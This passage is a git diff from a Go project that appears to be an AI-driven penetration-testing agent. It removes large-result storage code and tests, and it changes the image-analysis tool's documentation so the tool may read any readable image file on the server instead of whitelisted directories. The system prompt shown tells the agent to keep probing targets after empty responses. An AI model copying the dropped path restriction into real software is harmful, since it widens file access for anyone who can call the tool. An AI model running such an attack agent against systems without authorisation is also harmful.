skip_preprocess_below_bytes: 2097152 # 低于 2MB 且长边<=max_dimension 时原图直传;0=始终 JPEG 压缩
|
||||||
detail: low # low | high | auto
|
detail: low # low | high | auto
|
||||||
timeout_seconds: 60
|
timeout_seconds: 60
|
||||||
# allowed_roots: [] # 额外绝对路径根
|
|
||||||
```
|
```
|
||||||
|
|
||||||
`enabled: false` 时不注册工具。
|
`enabled: false` 时不注册工具。
|
||||||
@@ -31,14 +30,9 @@ vision:
|
|||||||
|
|
||||||
**系统设置 → 基本设置 → 视觉分析(analyze_image)** 可配置启用开关、视觉模型、API Key/Base URL(留空复用 OpenAI)、预处理参数;**保存并应用** 后写入 `config.yaml` 并重新注册 MCP 工具。
|
**系统设置 → 基本设置 → 视觉分析(analyze_image)** 可配置启用开关、视觉模型、API Key/Base URL(留空复用 OpenAI)、预处理参数;**保存并应用** 后写入 `config.yaml` 并重新注册 MCP 工具。
|
||||||
|
|
||||||
## 路径白名单
|
## 路径
|
||||||
|
|
||||||
默认可读:
|
`analyze_image` 可读取服务器上任意可读的图片文件路径(绝对路径或相对于进程工作目录的相对路径)。仍校验图片扩展名与常规文件类型。
|
||||||
|
|
||||||
- 进程工作目录(`cwd`)及其子路径
|
|
||||||
- `chat_uploads/`
|
|
||||||
- `agent.result_storage_dir`(默认 `tmp/`)
|
|
||||||
- `vision.allowed_roots` 中配置的绝对路径
|
|
||||||
|
|
||||||
## Agent 使用
|
## Agent 使用
|
||||||
|
|
||||||
|
|||||||
@@ -17,6 +17,7 @@ require (
|
|||||||
github.com/cloudwego/eino-ext/components/embedding/openai v0.0.0-20260427010451-749e3706378b
|
github.com/cloudwego/eino-ext/components/embedding/openai v0.0.0-20260427010451-749e3706378b
|
||||||
github.com/cloudwego/eino-ext/components/model/openai v0.1.13
|
github.com/cloudwego/eino-ext/components/model/openai v0.1.13
|
||||||
github.com/creack/pty v1.1.24
|
github.com/creack/pty v1.1.24
|
||||||
|
github.com/disintegration/imaging v1.6.2
|
||||||
github.com/eino-contrib/jsonschema v1.0.3
|
github.com/eino-contrib/jsonschema v1.0.3
|
||||||
github.com/gin-gonic/gin v1.9.1
|
github.com/gin-gonic/gin v1.9.1
|
||||||
github.com/google/uuid v1.6.0
|
github.com/google/uuid v1.6.0
|
||||||
@@ -49,7 +50,6 @@ require (
|
|||||||
github.com/cenkalti/backoff/v4 v4.3.0 // indirect
|
github.com/cenkalti/backoff/v4 v4.3.0 // indirect
|
||||||
github.com/cloudwego/base64x v0.1.6 // indirect
|
github.com/cloudwego/base64x v0.1.6 // indirect
|
||||||
github.com/cloudwego/eino-ext/libs/acl/openai v0.1.17 // indirect
|
github.com/cloudwego/eino-ext/libs/acl/openai v0.1.17 // indirect
|
||||||
github.com/disintegration/imaging v1.6.2 // indirect
|
|
||||||
github.com/dlclark/regexp2 v1.10.0 // indirect
|
github.com/dlclark/regexp2 v1.10.0 // indirect
|
||||||
github.com/dustin/go-humanize v1.0.1 // indirect
|
github.com/dustin/go-humanize v1.0.1 // indirect
|
||||||
github.com/evanphx/json-patch v0.5.2 // indirect
|
github.com/evanphx/json-patch v0.5.2 // indirect
|
||||||
|
|||||||
Binary file not shown.
|
Before Width: | Height: | Size: 726 KiB After Width: | Height: | Size: 941 KiB |
Binary file not shown.
|
Before Width: | Height: | Size: 178 KiB After Width: | Height: | Size: 179 KiB |
+17
-135
@@ -18,7 +18,6 @@ import (
|
|||||||
"cyberstrike-ai/internal/mcp"
|
"cyberstrike-ai/internal/mcp"
|
||||||
"cyberstrike-ai/internal/mcp/builtin"
|
"cyberstrike-ai/internal/mcp/builtin"
|
||||||
"cyberstrike-ai/internal/openai"
|
"cyberstrike-ai/internal/openai"
|
||||||
"cyberstrike-ai/internal/storage"
|
|
||||||
|
|
||||||
"go.uber.org/zap"
|
"go.uber.org/zap"
|
||||||
)
|
)
|
||||||
@@ -32,8 +31,6 @@ type Agent struct {
|
|||||||
externalMCPMgr *mcp.ExternalMCPManager // 外部MCP管理器
|
externalMCPMgr *mcp.ExternalMCPManager // 外部MCP管理器
|
||||||
logger *zap.Logger
|
logger *zap.Logger
|
||||||
maxIterations int
|
maxIterations int
|
||||||
resultStorage ResultStorage // 结果存储
|
|
||||||
largeResultThreshold int // 大结果阈值(字节)
|
|
||||||
mu sync.RWMutex // 添加互斥锁以支持并发更新
|
mu sync.RWMutex // 添加互斥锁以支持并发更新
|
||||||
toolNameMapping map[string]string // 工具名称映射:OpenAI格式 -> 原始格式(用于外部MCP工具)
|
toolNameMapping map[string]string // 工具名称映射:OpenAI格式 -> 原始格式(用于外部MCP工具)
|
||||||
currentConversationID string // 当前对话ID(用于自动传递给工具)
|
currentConversationID string // 当前对话ID(用于自动传递给工具)
|
||||||
@@ -41,18 +38,6 @@ type Agent struct {
|
|||||||
toolDescriptionMode string // 工具描述模式: "short" | "full",默认 short
|
toolDescriptionMode string // 工具描述模式: "short" | "full",默认 short
|
||||||
}
|
}
|
||||||
|
|
||||||
// ResultStorage 结果存储接口(直接使用 storage 包的类型)
|
|
||||||
type ResultStorage interface {
|
|
||||||
SaveResult(executionID string, toolName string, result string) error
|
|
||||||
GetResult(executionID string) (string, error)
|
|
||||||
GetResultPage(executionID string, page int, limit int) (*storage.ResultPage, error)
|
|
||||||
SearchResult(executionID string, keyword string, useRegex bool) ([]string, error)
|
|
||||||
FilterResult(executionID string, filter string, useRegex bool) ([]string, error)
|
|
||||||
GetResultMetadata(executionID string) (*storage.ResultMetadata, error)
|
|
||||||
GetResultPath(executionID string) string
|
|
||||||
DeleteResult(executionID string) error
|
|
||||||
}
|
|
||||||
|
|
||||||
type agentConversationIDKey struct{}
|
type agentConversationIDKey struct{}
|
||||||
|
|
||||||
func withAgentConversationID(ctx context.Context, id string) context.Context {
|
func withAgentConversationID(ctx context.Context, id string) context.Context {
|
||||||
@@ -83,26 +68,6 @@ func NewAgent(cfg *config.OpenAIConfig, agentCfg *config.AgentConfig, mcpServer
|
|||||||
maxIterations = 30
|
maxIterations = 30
|
||||||
}
|
}
|
||||||
|
|
||||||
// 设置大结果阈值,默认50KB
|
|
||||||
largeResultThreshold := 50 * 1024
|
|
||||||
if agentCfg != nil && agentCfg.LargeResultThreshold > 0 {
|
|
||||||
largeResultThreshold = agentCfg.LargeResultThreshold
|
|
||||||
}
|
|
||||||
|
|
||||||
// 设置结果存储目录,默认tmp
|
|
||||||
resultStorageDir := "tmp"
|
|
||||||
if agentCfg != nil && agentCfg.ResultStorageDir != "" {
|
|
||||||
resultStorageDir = agentCfg.ResultStorageDir
|
|
||||||
}
|
|
||||||
|
|
||||||
// 初始化结果存储
|
|
||||||
var resultStorage ResultStorage
|
|
||||||
if resultStorageDir != "" {
|
|
||||||
// 导入storage包(避免循环依赖,使用接口)
|
|
||||||
// 这里需要在实际使用时初始化
|
|
||||||
// 暂时设为nil,在需要时初始化
|
|
||||||
}
|
|
||||||
|
|
||||||
// 配置HTTP Transport,优化连接管理和超时设置
|
// 配置HTTP Transport,优化连接管理和超时设置
|
||||||
transport := &http.Transport{
|
transport := &http.Transport{
|
||||||
DialContext: (&net.Dialer{
|
DialContext: (&net.Dialer{
|
||||||
@@ -133,20 +98,11 @@ func NewAgent(cfg *config.OpenAIConfig, agentCfg *config.AgentConfig, mcpServer
|
|||||||
externalMCPMgr: externalMCPMgr,
|
externalMCPMgr: externalMCPMgr,
|
||||||
logger: logger,
|
logger: logger,
|
||||||
maxIterations: maxIterations,
|
maxIterations: maxIterations,
|
||||||
resultStorage: resultStorage,
|
|
||||||
largeResultThreshold: largeResultThreshold,
|
|
||||||
toolNameMapping: make(map[string]string), // 初始化工具名称映射
|
toolNameMapping: make(map[string]string), // 初始化工具名称映射
|
||||||
toolDescriptionMode: "short",
|
toolDescriptionMode: "short",
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
// SetResultStorage 设置结果存储(用于避免循环依赖)
|
|
||||||
func (a *Agent) SetResultStorage(storage ResultStorage) {
|
|
||||||
a.mu.Lock()
|
|
||||||
defer a.mu.Unlock()
|
|
||||||
a.resultStorage = storage
|
|
||||||
}
|
|
||||||
|
|
||||||
// SetPromptBaseDir 设置单代理 system_prompt_path 相对路径的基准目录(一般为 config.yaml 所在目录)。
|
// SetPromptBaseDir 设置单代理 system_prompt_path 相对路径的基准目录(一般为 config.yaml 所在目录)。
|
||||||
func (a *Agent) SetPromptBaseDir(dir string) {
|
func (a *Agent) SetPromptBaseDir(dir string) {
|
||||||
a.mu.Lock()
|
a.mu.Lock()
|
||||||
@@ -663,46 +619,6 @@ func (a *Agent) executeToolViaMCP(ctx context.Context, toolName string, args map
|
|||||||
}
|
}
|
||||||
|
|
||||||
resultStr := resultText.String()
|
resultStr := resultText.String()
|
||||||
resultSize := len(resultStr)
|
|
||||||
|
|
||||||
// 检测大结果并保存
|
|
||||||
a.mu.RLock()
|
|
||||||
threshold := a.largeResultThreshold
|
|
||||||
storage := a.resultStorage
|
|
||||||
a.mu.RUnlock()
|
|
||||||
|
|
||||||
if resultSize > threshold && storage != nil {
|
|
||||||
// 异步保存大结果
|
|
||||||
go func() {
|
|
||||||
if err := storage.SaveResult(executionID, toolName, resultStr); err != nil {
|
|
||||||
a.logger.Warn("保存大结果失败",
|
|
||||||
zap.String("executionID", executionID),
|
|
||||||
zap.String("toolName", toolName),
|
|
||||||
zap.Error(err),
|
|
||||||
)
|
|
||||||
} else {
|
|
||||||
a.logger.Info("大结果已保存",
|
|
||||||
zap.String("executionID", executionID),
|
|
||||||
zap.String("toolName", toolName),
|
|
||||||
zap.Int("size", resultSize),
|
|
||||||
)
|
|
||||||
}
|
|
||||||
}()
|
|
||||||
|
|
||||||
// 返回最小化通知
|
|
||||||
lines := strings.Split(resultStr, "\n")
|
|
||||||
filePath := ""
|
|
||||||
if storage != nil {
|
|
||||||
filePath = storage.GetResultPath(executionID)
|
|
||||||
}
|
|
||||||
notification := a.formatMinimalNotification(executionID, toolName, resultSize, len(lines), filePath)
|
|
||||||
|
|
||||||
return &ToolExecutionResult{
|
|
||||||
Result: notification,
|
|
||||||
ExecutionID: executionID,
|
|
||||||
IsError: result != nil && result.IsError,
|
|
||||||
}, nil
|
|
||||||
}
|
|
||||||
|
|
||||||
return &ToolExecutionResult{
|
return &ToolExecutionResult{
|
||||||
Result: resultStr,
|
Result: resultStr,
|
||||||
@@ -711,57 +627,6 @@ func (a *Agent) executeToolViaMCP(ctx context.Context, toolName string, args map
|
|||||||
}, nil
|
}, nil
|
||||||
}
|
}
|
||||||
|
|
||||||
// formatMinimalNotification 格式化最小化通知
|
|
||||||
func (a *Agent) formatMinimalNotification(executionID string, toolName string, size int, lineCount int, filePath string) string {
|
|
||||||
var sb strings.Builder
|
|
||||||
|
|
||||||
sb.WriteString(fmt.Sprintf("工具执行完成。结果已保存(ID: %s)。\n\n", executionID))
|
|
||||||
sb.WriteString("结果信息:\n")
|
|
||||||
sb.WriteString(fmt.Sprintf(" - 工具: %s\n", toolName))
|
|
||||||
sb.WriteString(fmt.Sprintf(" - 大小: %d 字节 (%.2f KB)\n", size, float64(size)/1024))
|
|
||||||
sb.WriteString(fmt.Sprintf(" - 行数: %d 行\n", lineCount))
|
|
||||||
if filePath != "" {
|
|
||||||
sb.WriteString(fmt.Sprintf(" - 文件路径: %s\n", filePath))
|
|
||||||
}
|
|
||||||
sb.WriteString("\n")
|
|
||||||
sb.WriteString("推荐使用 query_execution_result 工具查询完整结果:\n")
|
|
||||||
sb.WriteString(fmt.Sprintf(" - 查询第一页: query_execution_result(execution_id=\"%s\", page=1, limit=100)\n", executionID))
|
|
||||||
sb.WriteString(fmt.Sprintf(" - 搜索关键词: query_execution_result(execution_id=\"%s\", search=\"关键词\")\n", executionID))
|
|
||||||
sb.WriteString(fmt.Sprintf(" - 过滤条件: query_execution_result(execution_id=\"%s\", filter=\"error\")\n", executionID))
|
|
||||||
sb.WriteString(fmt.Sprintf(" - 正则匹配: query_execution_result(execution_id=\"%s\", search=\"\\\\d+\\\\.\\\\d+\\\\.\\\\d+\\\\.\\\\d+\", use_regex=true)\n", executionID))
|
|
||||||
sb.WriteString("\n")
|
|
||||||
if filePath != "" {
|
|
||||||
sb.WriteString("如果 query_execution_result 工具不满足需求,也可以使用其他工具处理文件:\n")
|
|
||||||
sb.WriteString("\n")
|
|
||||||
sb.WriteString("**分段读取示例:**\n")
|
|
||||||
sb.WriteString(fmt.Sprintf(" - 查看前100行: exec(command=\"head\", args=[\"-n\", \"100\", \"%s\"])\n", filePath))
|
|
||||||
sb.WriteString(fmt.Sprintf(" - 查看后100行: exec(command=\"tail\", args=[\"-n\", \"100\", \"%s\"])\n", filePath))
|
|
||||||
sb.WriteString(fmt.Sprintf(" - 查看第50-150行: exec(command=\"sed\", args=[\"-n\", \"50,150p\", \"%s\"])\n", filePath))
|
|
||||||
sb.WriteString("\n")
|
|
||||||
sb.WriteString("**搜索和正则匹配示例:**\n")
|
|
||||||
sb.WriteString(fmt.Sprintf(" - 搜索关键词: exec(command=\"grep\", args=[\"关键词\", \"%s\"])\n", filePath))
|
|
||||||
sb.WriteString(fmt.Sprintf(" - 正则匹配IP地址: exec(command=\"grep\", args=[\"-E\", \"\\\\d+\\\\.\\\\d+\\\\.\\\\d+\\\\.\\\\d+\", \"%s\"])\n", filePath))
|
|
||||||
sb.WriteString(fmt.Sprintf(" - 不区分大小写搜索: exec(command=\"grep\", args=[\"-i\", \"关键词\", \"%s\"])\n", filePath))
|
|
||||||
sb.WriteString(fmt.Sprintf(" - 显示匹配行号: exec(command=\"grep\", args=[\"-n\", \"关键词\", \"%s\"])\n", filePath))
|
|
||||||
sb.WriteString("\n")
|
|
||||||
sb.WriteString("**过滤和统计示例:**\n")
|
|
||||||
sb.WriteString(fmt.Sprintf(" - 统计总行数: exec(command=\"wc\", args=[\"-l\", \"%s\"])\n", filePath))
|
|
||||||
sb.WriteString(fmt.Sprintf(" - 过滤包含error的行: exec(command=\"grep\", args=[\"error\", \"%s\"])\n", filePath))
|
|
||||||
sb.WriteString(fmt.Sprintf(" - 排除空行: exec(command=\"grep\", args=[\"-v\", \"^$\", \"%s\"])\n", filePath))
|
|
||||||
sb.WriteString("\n")
|
|
||||||
sb.WriteString("**完整读取(不推荐大文件):**\n")
|
|
||||||
sb.WriteString(fmt.Sprintf(" - 使用 cat 工具: cat(file=\"%s\")\n", filePath))
|
|
||||||
sb.WriteString(fmt.Sprintf(" - 使用 exec 工具: exec(command=\"cat\", args=[\"%s\"])\n", filePath))
|
|
||||||
sb.WriteString("\n")
|
|
||||||
sb.WriteString("**注意:**\n")
|
|
||||||
sb.WriteString(" - 直接读取大文件可能会再次触发大结果保存机制\n")
|
|
||||||
sb.WriteString(" - 建议优先使用分段读取和搜索功能,避免一次性加载整个文件\n")
|
|
||||||
sb.WriteString(" - 正则表达式语法遵循标准 POSIX 正则表达式规范\n")
|
|
||||||
}
|
|
||||||
|
|
||||||
return sb.String()
|
|
||||||
}
|
|
||||||
|
|
||||||
// UpdateConfig 更新OpenAI配置
|
// UpdateConfig 更新OpenAI配置
|
||||||
func (a *Agent) UpdateConfig(cfg *config.OpenAIConfig) {
|
func (a *Agent) UpdateConfig(cfg *config.OpenAIConfig) {
|
||||||
a.mu.Lock()
|
a.mu.Lock()
|
||||||
@@ -923,6 +788,23 @@ func (a *Agent) RecordLocalToolExecution(toolName string, args map[string]interf
|
|||||||
return a.mcpServer.RecordCompletedToolInvocation(toolName, args, resultText, invokeErr)
|
return a.mcpServer.RecordCompletedToolInvocation(toolName, args, resultText, invokeErr)
|
||||||
}
|
}
|
||||||
|
|
||||||
|
// UpdateMCPExecutionDisplayResult 将监控库中的工具结果更新为送入模型的展示正文(reduction 后)。
|
||||||
|
func (a *Agent) UpdateMCPExecutionDisplayResult(executionID, resultText string) {
|
||||||
|
if a == nil || strings.TrimSpace(executionID) == "" {
|
||||||
|
return
|
||||||
|
}
|
||||||
|
text := resultText
|
||||||
|
if strings.TrimSpace(text) == "" {
|
||||||
|
text = "(无输出)"
|
||||||
|
}
|
||||||
|
tr := &mcp.ToolResult{
|
||||||
|
Content: []mcp.Content{{Type: "text", Text: text}},
|
||||||
|
}
|
||||||
|
if a.mcpServer != nil {
|
||||||
|
_ = a.mcpServer.UpdateToolExecutionResult(executionID, tr)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
// CancelMCPToolExecutionWithNote 取消一次进行中的 MCP 工具(先内部后外部),与监控页「终止工具」一致;note 非空时合并进返回给模型的文本。
|
// CancelMCPToolExecutionWithNote 取消一次进行中的 MCP 工具(先内部后外部),与监控页「终止工具」一致;note 非空时合并进返回给模型的文本。
|
||||||
func (a *Agent) CancelMCPToolExecutionWithNote(executionID, note string) bool {
|
func (a *Agent) CancelMCPToolExecutionWithNote(executionID, note string) bool {
|
||||||
executionID = strings.TrimSpace(executionID)
|
executionID = strings.TrimSpace(executionID)
|
||||||
|
|||||||
@@ -1,21 +1,16 @@
|
|||||||
package agent
|
package agent
|
||||||
|
|
||||||
import (
|
import (
|
||||||
"os"
|
|
||||||
"path/filepath"
|
|
||||||
"strings"
|
|
||||||
"testing"
|
"testing"
|
||||||
"time"
|
|
||||||
|
|
||||||
"cyberstrike-ai/internal/config"
|
"cyberstrike-ai/internal/config"
|
||||||
"cyberstrike-ai/internal/mcp"
|
"cyberstrike-ai/internal/mcp"
|
||||||
"cyberstrike-ai/internal/storage"
|
|
||||||
|
|
||||||
"go.uber.org/zap"
|
"go.uber.org/zap"
|
||||||
)
|
)
|
||||||
|
|
||||||
// setupTestAgent 创建测试用的Agent
|
// setupTestAgent 创建测试用的Agent
|
||||||
func setupTestAgent(t *testing.T) (*Agent, *storage.FileResultStorage) {
|
func setupTestAgent(t *testing.T) *Agent {
|
||||||
logger := zap.NewNop()
|
logger := zap.NewNop()
|
||||||
mcpServer := mcp.NewServer(logger)
|
mcpServer := mcp.NewServer(logger)
|
||||||
|
|
||||||
@@ -26,205 +21,10 @@ func setupTestAgent(t *testing.T) (*Agent, *storage.FileResultStorage) {
|
|||||||
}
|
}
|
||||||
|
|
||||||
agentCfg := &config.AgentConfig{
|
agentCfg := &config.AgentConfig{
|
||||||
MaxIterations: 10,
|
MaxIterations: 10,
|
||||||
LargeResultThreshold: 100, // 设置较小的阈值便于测试
|
|
||||||
ResultStorageDir: "",
|
|
||||||
}
|
}
|
||||||
|
|
||||||
agent := NewAgent(openAICfg, agentCfg, mcpServer, nil, logger, 10)
|
return NewAgent(openAICfg, agentCfg, mcpServer, nil, logger, 10)
|
||||||
|
|
||||||
// 创建测试存储
|
|
||||||
tmpDir := filepath.Join(os.TempDir(), "test_agent_storage_"+time.Now().Format("20060102_150405"))
|
|
||||||
testStorage, err := storage.NewFileResultStorage(tmpDir, logger)
|
|
||||||
if err != nil {
|
|
||||||
t.Fatalf("创建测试存储失败: %v", err)
|
|
||||||
}
|
|
||||||
|
|
||||||
agent.SetResultStorage(testStorage)
|
|
||||||
|
|
||||||
return agent, testStorage
|
|
||||||
}
|
|
||||||
|
|
||||||
func TestAgent_FormatMinimalNotification(t *testing.T) {
|
|
||||||
agent, testStorage := setupTestAgent(t)
|
|
||||||
_ = testStorage // 避免未使用变量警告
|
|
||||||
|
|
||||||
executionID := "test_exec_001"
|
|
||||||
toolName := "nmap_scan"
|
|
||||||
size := 50000
|
|
||||||
lineCount := 1000
|
|
||||||
filePath := "tmp/test_exec_001.txt"
|
|
||||||
|
|
||||||
notification := agent.formatMinimalNotification(executionID, toolName, size, lineCount, filePath)
|
|
||||||
|
|
||||||
// 验证通知包含必要信息
|
|
||||||
if !strings.Contains(notification, executionID) {
|
|
||||||
t.Errorf("通知中应该包含执行ID: %s", executionID)
|
|
||||||
}
|
|
||||||
|
|
||||||
if !strings.Contains(notification, toolName) {
|
|
||||||
t.Errorf("通知中应该包含工具名称: %s", toolName)
|
|
||||||
}
|
|
||||||
|
|
||||||
if !strings.Contains(notification, "50000") {
|
|
||||||
t.Errorf("通知中应该包含大小信息")
|
|
||||||
}
|
|
||||||
|
|
||||||
if !strings.Contains(notification, "1000") {
|
|
||||||
t.Errorf("通知中应该包含行数信息")
|
|
||||||
}
|
|
||||||
|
|
||||||
if !strings.Contains(notification, "query_execution_result") {
|
|
||||||
t.Errorf("通知中应该包含查询工具的使用说明")
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
func TestAgent_ExecuteToolViaMCP_LargeResult(t *testing.T) {
|
|
||||||
agent, _ := setupTestAgent(t)
|
|
||||||
|
|
||||||
// 创建模拟的MCP工具结果(大结果)
|
|
||||||
largeResult := &mcp.ToolResult{
|
|
||||||
Content: []mcp.Content{
|
|
||||||
{
|
|
||||||
Type: "text",
|
|
||||||
Text: strings.Repeat("This is a test line with some content.\n", 1000), // 约50KB
|
|
||||||
},
|
|
||||||
},
|
|
||||||
IsError: false,
|
|
||||||
}
|
|
||||||
|
|
||||||
// 模拟MCP服务器返回大结果
|
|
||||||
// 由于我们需要模拟CallTool的行为,这里需要创建一个mock或者使用实际的MCP服务器
|
|
||||||
// 为了简化测试,我们直接测试结果处理逻辑
|
|
||||||
|
|
||||||
// 设置阈值
|
|
||||||
agent.mu.Lock()
|
|
||||||
agent.largeResultThreshold = 1000 // 设置较小的阈值
|
|
||||||
agent.mu.Unlock()
|
|
||||||
|
|
||||||
// 创建执行ID
|
|
||||||
executionID := "test_exec_large_001"
|
|
||||||
toolName := "test_tool"
|
|
||||||
|
|
||||||
// 格式化结果
|
|
||||||
var resultText strings.Builder
|
|
||||||
for _, content := range largeResult.Content {
|
|
||||||
resultText.WriteString(content.Text)
|
|
||||||
resultText.WriteString("\n")
|
|
||||||
}
|
|
||||||
|
|
||||||
resultStr := resultText.String()
|
|
||||||
resultSize := len(resultStr)
|
|
||||||
|
|
||||||
// 检测大结果并保存
|
|
||||||
agent.mu.RLock()
|
|
||||||
threshold := agent.largeResultThreshold
|
|
||||||
storage := agent.resultStorage
|
|
||||||
agent.mu.RUnlock()
|
|
||||||
|
|
||||||
if resultSize > threshold && storage != nil {
|
|
||||||
// 保存大结果
|
|
||||||
err := storage.SaveResult(executionID, toolName, resultStr)
|
|
||||||
if err != nil {
|
|
||||||
t.Fatalf("保存大结果失败: %v", err)
|
|
||||||
}
|
|
||||||
|
|
||||||
// 生成通知
|
|
||||||
lines := strings.Split(resultStr, "\n")
|
|
||||||
filePath := storage.GetResultPath(executionID)
|
|
||||||
notification := agent.formatMinimalNotification(executionID, toolName, resultSize, len(lines), filePath)
|
|
||||||
|
|
||||||
// 验证通知格式
|
|
||||||
if !strings.Contains(notification, executionID) {
|
|
||||||
t.Errorf("通知中应该包含执行ID")
|
|
||||||
}
|
|
||||||
|
|
||||||
// 验证结果已保存
|
|
||||||
savedResult, err := storage.GetResult(executionID)
|
|
||||||
if err != nil {
|
|
||||||
t.Fatalf("获取保存的结果失败: %v", err)
|
|
||||||
}
|
|
||||||
|
|
||||||
if savedResult != resultStr {
|
|
||||||
t.Errorf("保存的结果与原始结果不匹配")
|
|
||||||
}
|
|
||||||
} else {
|
|
||||||
t.Fatal("大结果应该被检测到并保存")
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
func TestAgent_ExecuteToolViaMCP_SmallResult(t *testing.T) {
|
|
||||||
agent, _ := setupTestAgent(t)
|
|
||||||
|
|
||||||
// 创建小结果
|
|
||||||
smallResult := &mcp.ToolResult{
|
|
||||||
Content: []mcp.Content{
|
|
||||||
{
|
|
||||||
Type: "text",
|
|
||||||
Text: "Small result content",
|
|
||||||
},
|
|
||||||
},
|
|
||||||
IsError: false,
|
|
||||||
}
|
|
||||||
|
|
||||||
// 设置较大的阈值
|
|
||||||
agent.mu.Lock()
|
|
||||||
agent.largeResultThreshold = 100000 // 100KB
|
|
||||||
agent.mu.Unlock()
|
|
||||||
|
|
||||||
// 格式化结果
|
|
||||||
var resultText strings.Builder
|
|
||||||
for _, content := range smallResult.Content {
|
|
||||||
resultText.WriteString(content.Text)
|
|
||||||
resultText.WriteString("\n")
|
|
||||||
}
|
|
||||||
|
|
||||||
resultStr := resultText.String()
|
|
||||||
resultSize := len(resultStr)
|
|
||||||
|
|
||||||
// 检测大结果
|
|
||||||
agent.mu.RLock()
|
|
||||||
threshold := agent.largeResultThreshold
|
|
||||||
storage := agent.resultStorage
|
|
||||||
agent.mu.RUnlock()
|
|
||||||
|
|
||||||
if resultSize > threshold && storage != nil {
|
|
||||||
t.Fatal("小结果不应该被保存")
|
|
||||||
}
|
|
||||||
|
|
||||||
// 小结果应该直接返回
|
|
||||||
if resultSize <= threshold {
|
|
||||||
// 这是预期的行为
|
|
||||||
if resultStr == "" {
|
|
||||||
t.Fatal("小结果应该直接返回,不应该为空")
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
func TestAgent_SetResultStorage(t *testing.T) {
|
|
||||||
agent, _ := setupTestAgent(t)
|
|
||||||
|
|
||||||
// 创建新的存储
|
|
||||||
tmpDir := filepath.Join(os.TempDir(), "test_new_storage_"+time.Now().Format("20060102_150405"))
|
|
||||||
newStorage, err := storage.NewFileResultStorage(tmpDir, zap.NewNop())
|
|
||||||
if err != nil {
|
|
||||||
t.Fatalf("创建新存储失败: %v", err)
|
|
||||||
}
|
|
||||||
|
|
||||||
// 设置新存储
|
|
||||||
agent.SetResultStorage(newStorage)
|
|
||||||
|
|
||||||
// 验证存储已更新
|
|
||||||
agent.mu.RLock()
|
|
||||||
currentStorage := agent.resultStorage
|
|
||||||
agent.mu.RUnlock()
|
|
||||||
|
|
||||||
if currentStorage != newStorage {
|
|
||||||
t.Fatal("存储未正确更新")
|
|
||||||
}
|
|
||||||
|
|
||||||
// 清理
|
|
||||||
os.RemoveAll(tmpDir)
|
|
||||||
}
|
}
|
||||||
|
|
||||||
func TestAgent_NewAgent_DefaultValues(t *testing.T) {
|
func TestAgent_NewAgent_DefaultValues(t *testing.T) {
|
||||||
@@ -243,14 +43,6 @@ func TestAgent_NewAgent_DefaultValues(t *testing.T) {
|
|||||||
if agent.maxIterations != 30 {
|
if agent.maxIterations != 30 {
|
||||||
t.Errorf("默认迭代次数不匹配。期望: 30, 实际: %d", agent.maxIterations)
|
t.Errorf("默认迭代次数不匹配。期望: 30, 实际: %d", agent.maxIterations)
|
||||||
}
|
}
|
||||||
|
|
||||||
agent.mu.RLock()
|
|
||||||
threshold := agent.largeResultThreshold
|
|
||||||
agent.mu.RUnlock()
|
|
||||||
|
|
||||||
if threshold != 50*1024 {
|
|
||||||
t.Errorf("默认阈值不匹配。期望: %d, 实际: %d", 50*1024, threshold)
|
|
||||||
}
|
|
||||||
}
|
}
|
||||||
|
|
||||||
func TestAgent_NewAgent_CustomConfig(t *testing.T) {
|
func TestAgent_NewAgent_CustomConfig(t *testing.T) {
|
||||||
@@ -264,9 +56,7 @@ func TestAgent_NewAgent_CustomConfig(t *testing.T) {
|
|||||||
}
|
}
|
||||||
|
|
||||||
agentCfg := &config.AgentConfig{
|
agentCfg := &config.AgentConfig{
|
||||||
MaxIterations: 20,
|
MaxIterations: 20,
|
||||||
LargeResultThreshold: 100 * 1024, // 100KB
|
|
||||||
ResultStorageDir: "custom_tmp",
|
|
||||||
}
|
}
|
||||||
|
|
||||||
agent := NewAgent(openAICfg, agentCfg, mcpServer, nil, logger, 15)
|
agent := NewAgent(openAICfg, agentCfg, mcpServer, nil, logger, 15)
|
||||||
@@ -274,12 +64,4 @@ func TestAgent_NewAgent_CustomConfig(t *testing.T) {
|
|||||||
if agent.maxIterations != 15 {
|
if agent.maxIterations != 15 {
|
||||||
t.Errorf("迭代次数不匹配。期望: 15, 实际: %d", agent.maxIterations)
|
t.Errorf("迭代次数不匹配。期望: 15, 实际: %d", agent.maxIterations)
|
||||||
}
|
}
|
||||||
|
|
||||||
agent.mu.RLock()
|
|
||||||
threshold := agent.largeResultThreshold
|
|
||||||
agent.mu.RUnlock()
|
|
||||||
|
|
||||||
if threshold != 100*1024 {
|
|
||||||
t.Errorf("阈值不匹配。期望: %d, 实际: %d", 100*1024, threshold)
|
|
||||||
}
|
|
||||||
}
|
}
|
||||||
|
|||||||
@@ -1,7 +1,7 @@
|
|||||||
package agent
|
package agent
|
||||||
|
|
||||||
import (
|
import (
|
||||||
"cyberstrike-ai/internal/project"
|
"cyberstrike-ai/internal/projectprompt"
|
||||||
)
|
)
|
||||||
|
|
||||||
// DefaultSingleAgentSystemPrompt 单代理(Eino ADK / MCP)内置系统提示;可通过 agent.system_prompt_path 覆盖为文件。
|
// DefaultSingleAgentSystemPrompt 单代理(Eino ADK / MCP)内置系统提示;可通过 agent.system_prompt_path 覆盖为文件。
|
||||||
@@ -107,7 +107,7 @@ func DefaultSingleAgentSystemPrompt() string {
|
|||||||
- 若最近一步得到 404/空结果/无效响应,不得直接结束;至少再进行一次“同目标不同策略”的验证(如变更路径、参数、请求方法、上下文来源)。
|
- 若最近一步得到 404/空结果/无效响应,不得直接结束;至少再进行一次“同目标不同策略”的验证(如变更路径、参数、请求方法、上下文来源)。
|
||||||
- 避免无效空转:同一工具+同类参数连续失败 3 次后,必须切换策略(改工具、改入口、改假设)并说明切换原因。
|
- 避免无效空转:同一工具+同类参数连续失败 3 次后,必须切换策略(改工具、改入口、改假设)并说明切换原因。
|
||||||
|
|
||||||
` + project.FactRecordingBlackboardSection(false) + `
|
` + projectprompt.FactRecordingBlackboardSection(false) + `
|
||||||
|
|
||||||
## 技能库(Skills)与知识库
|
## 技能库(Skills)与知识库
|
||||||
|
|
||||||
|
|||||||
+28
-27
@@ -25,10 +25,10 @@ import (
|
|||||||
"cyberstrike-ai/internal/logger"
|
"cyberstrike-ai/internal/logger"
|
||||||
